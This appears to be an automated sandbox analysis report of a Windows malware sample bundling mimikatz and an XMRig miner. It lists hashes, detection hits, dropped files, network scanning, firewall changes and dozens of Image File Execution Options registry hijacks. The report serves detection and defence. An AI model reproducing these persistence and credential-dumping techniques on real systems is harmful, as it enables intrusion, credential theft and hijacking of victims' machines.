Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10-07-2024 08:24
Behavioral task
behavioral1
Sample
2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240709-en
General
-
Target
2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe
-
Size
8.4MB
-
MD5
49489f50da3d372fe26ee4db5d24299c
-
SHA1
92ee2308c88587d5ca115d9d9d9cbf7ce1425333
-
SHA256
aa393485f34b46603d92085a6c52a2acd685c69e5fef83f0b0a5cd318f014e26
-
SHA512
dfa0a01bf322ac169b265efb8669912a7231adce6aed5640ab095a7441b4c1c007c8c803903fa28b1d7d736f11b5aa5234a30362eb6abccb06ef0169e13deff2
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2072 created 1688 2072 wufpycp.exe 37 -
Contacts a large (29407) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/4812-182-0x00007FF793000000-0x00007FF793120000-memory.dmp xmrig behavioral2/memory/4812-192-0x00007FF793000000-0x00007FF793120000-memory.dmp xmrig behavioral2/memory/4812-201-0x00007FF793000000-0x00007FF793120000-memory.dmp xmrig behavioral2/memory/4812-211-0x00007FF793000000-0x00007FF793120000-memory.dmp xmrig behavioral2/memory/4812-222-0x00007FF793000000-0x00007FF793120000-memory.dmp xmrig behavioral2/memory/4812-234-0x00007FF793000000-0x00007FF793120000-memory.dmp xmrig behavioral2/memory/4812-245-0x00007FF793000000-0x00007FF793120000-memory.dmp xmrig behavioral2/memory/4812-264-0x00007FF793000000-0x00007FF793120000-memory.dmp xmrig behavioral2/memory/4812-265-0x00007FF793000000-0x00007FF793120000-memory.dmp xmrig behavioral2/memory/4812-267-0x00007FF793000000-0x00007FF793120000-memory.dmp xmrig behavioral2/memory/4812-269-0x00007FF793000000-0x00007FF793120000-memory.dmp xmrig behavioral2/memory/4812-270-0x00007FF793000000-0x00007FF793120000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/1072-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1072-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x00080000000234a9-6.dat mimikatz behavioral2/memory/1764-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1436-138-0x00007FF7DA250000-0x00007FF7DA33E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts wufpycp.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts wufpycp.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe wufpycp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe wufpycp.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3420 netsh.exe 1664 netsh.exe -
Executes dropped EXE 26 IoCs
pid Process 1764 wufpycp.exe 2072 wufpycp.exe 1652 wpcap.exe 2908 fwecknipu.exe 1436 vfshost.exe 1220 cbfrbbacp.exe 2100 xohudmc.exe 2624 ogiqci.exe 4812 qfkbee.exe 1828 cbfrbbacp.exe 1456 cbfrbbacp.exe 4972 cbfrbbacp.exe 4352 cbfrbbacp.exe 4220 cbfrbbacp.exe 3880 cbfrbbacp.exe 4092 cbfrbbacp.exe 3180 cbfrbbacp.exe 1384 cbfrbbacp.exe 1016 cbfrbbacp.exe 1492 cbfrbbacp.exe 4608 wufpycp.exe 2908 cbfrbbacp.exe 5044 cbfrbbacp.exe 3964 cbfrbbacp.exe 4460 qiezzkiir.exe 2120 wufpycp.exe -
Loads dropped DLL 12 IoCs
pid Process 1652 wpcap.exe 1652 wpcap.exe 1652 wpcap.exe 1652 wpcap.exe 1652 wpcap.exe 1652 wpcap.exe 1652 wpcap.exe 1652 wpcap.exe 1652 wpcap.exe 2908 fwecknipu.exe 2908 fwecknipu.exe 2908 fwecknipu.exe -
resource yara_rule behavioral2/memory/1436-135-0x00007FF7DA250000-0x00007FF7DA33E000-memory.dmp upx behavioral2/files/0x00070000000234ee-136.dat upx behavioral2/memory/1436-138-0x00007FF7DA250000-0x00007FF7DA33E000-memory.dmp upx behavioral2/files/0x00070000000234f6-141.dat upx behavioral2/memory/1220-142-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/1220-146-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/files/0x00070000000234f8-163.dat upx behavioral2/memory/4812-164-0x00007FF793000000-0x00007FF793120000-memory.dmp upx behavioral2/memory/1828-172-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/1456-176-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/4972-180-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/4812-182-0x00007FF793000000-0x00007FF793120000-memory.dmp upx behavioral2/memory/4352-185-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/4220-189-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/4812-192-0x00007FF793000000-0x00007FF793120000-memory.dmp upx behavioral2/memory/3880-194-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/4092-198-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/4812-201-0x00007FF793000000-0x00007FF793120000-memory.dmp upx behavioral2/memory/3180-203-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/1384-207-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/4812-211-0x00007FF793000000-0x00007FF793120000-memory.dmp upx behavioral2/memory/1016-212-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/1492-216-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/4812-222-0x00007FF793000000-0x00007FF793120000-memory.dmp upx behavioral2/memory/2908-226-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/5044-230-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/3964-233-0x00007FF7A7480000-0x00007FF7A74DB000-memory.dmp upx behavioral2/memory/4812-234-0x00007FF793000000-0x00007FF793120000-memory.dmp upx behavioral2/memory/4812-245-0x00007FF793000000-0x00007FF793120000-memory.dmp upx behavioral2/memory/4812-264-0x00007FF793000000-0x00007FF793120000-memory.dmp upx behavioral2/memory/4812-265-0x00007FF793000000-0x00007FF793120000-memory.dmp upx behavioral2/memory/4812-267-0x00007FF793000000-0x00007FF793120000-memory.dmp upx behavioral2/memory/4812-269-0x00007FF793000000-0x00007FF793120000-memory.dmp upx behavioral2/memory/4812-270-0x00007FF793000000-0x00007FF793120000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 42 ifconfig.me 43 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\ogiqci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies wufpycp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft wufpycp.exe File created C:\Windows\SysWOW64\ogiqci.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 wufpycp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData wufpycp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 wufpycp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E40FD8910F68839A32C4CF3F7FD8741B wufpycp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E40FD8910F68839A32C4CF3F7FD8741B wufpycp.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache wufpycp.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE wufpycp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 wufpycp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content wufpycp.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\grcbdiffb\UnattendGC\specials\ucl.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\svschost.xml wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\vimpcsvc.xml wufpycp.exe File created C:\Windows\qwfeikpz\svschost.xml wufpycp.exe File created C:\Windows\qwfeikpz\schoedcl.xml wufpycp.exe File opened for modification C:\Windows\qwfeikpz\spoolsrv.xml wufpycp.exe File created C:\Windows\ime\wufpycp.exe wufpycp.exe File created C:\Windows\grcbdiffb\bbccvkzri\ip.txt wufpycp.exe File created C:\Windows\grcbdiffb\bbccvkzri\wpcap.exe wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\posh-0.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\xdvl-0.dll wufpycp.exe File created C:\Windows\grcbdiffb\bbccvkzri\scan.bat wufpycp.exe File created C:\Windows\grcbdiffb\bbccvkzri\qiezzkiir.exe wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\coli-0.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\libeay32.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\tibe-2.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\vimpcsvc.exe wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\svschost.xml wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\spoolsrv.xml wufpycp.exe File created C:\Windows\qwfeikpz\spoolsrv.xml wufpycp.exe File opened for modification C:\Windows\qwfeikpz\docmicfg.xml wufpycp.exe File opened for modification C:\Windows\grcbdiffb\bbccvkzri\Packet.dll wufpycp.exe File opened for modification C:\Windows\qwfeikpz\schoedcl.xml wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\vimpcsvc.xml wufpycp.exe File created C:\Windows\qwfeikpz\wufpycp.exe 2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\libxml2.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\docmicfg.xml wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\spoolsrv.xml wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\docmicfg.xml wufpycp.exe File created C:\Windows\qwfeikpz\vimpcsvc.xml wufpycp.exe File created C:\Windows\grcbdiffb\bbccvkzri\Packet.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\schoedcl.xml wufpycp.exe File opened for modification C:\Windows\qwfeikpz\vimpcsvc.xml wufpycp.exe File created C:\Windows\grcbdiffb\bbccvkzri\wpcap.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\trfo-2.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\schoedcl.xml wufpycp.exe File opened for modification C:\Windows\qwfeikpz\wufpycp.exe 2024-07-10_49489f50da3d372fe26ee4db5d24299c_hacktools_icedid_mimikatz.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\tucl-1.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\cnli-1.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\crli-0.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\trch-1.dll wufpycp.exe File created C:\Windows\grcbdiffb\bbccvkzri\fwecknipu.exe wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\exma-1.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\ssleay32.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\docmicfg.exe wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\Shellcode.ini wufpycp.exe File created C:\Windows\grcbdiffb\Corporate\mimidrv.sys wufpycp.exe File created C:\Windows\grcbdiffb\upbdrjv\swrpwe.exe wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\zlib1.dll wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\svschost.exe wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\spoolsrv.exe wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\specials\schoedcl.exe wufpycp.exe File created C:\Windows\qwfeikpz\docmicfg.xml wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\AppCapture64.dll wufpycp.exe File created C:\Windows\grcbdiffb\Corporate\mimilib.dll wufpycp.exe File opened for modification C:\Windows\grcbdiffb\Corporate\log.txt cmd.exe File opened for modification C:\Windows\grcbdiffb\bbccvkzri\Result.txt qiezzkiir.exe File opened for modification C:\Windows\qwfeikpz\svschost.xml wufpycp.exe File created C:\Windows\grcbdiffb\UnattendGC\AppCapture32.dll wufpycp.exe File created C:\Windows\grcbdiffb\Corporate\vfshost.exe wufpycp.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4336 sc.exe 3932 sc.exe 1484 sc.exe 2124 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x00080000000234a9-6.dat nsis_installer_2 behavioral2/files/0x00070000000234b1-15.dat nsis_installer_1 behavioral2/files/0x00070000000234b1-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 39 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" wufpycp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" wufpycp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" wufpycp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" wufpycp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cbfrbbacp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust 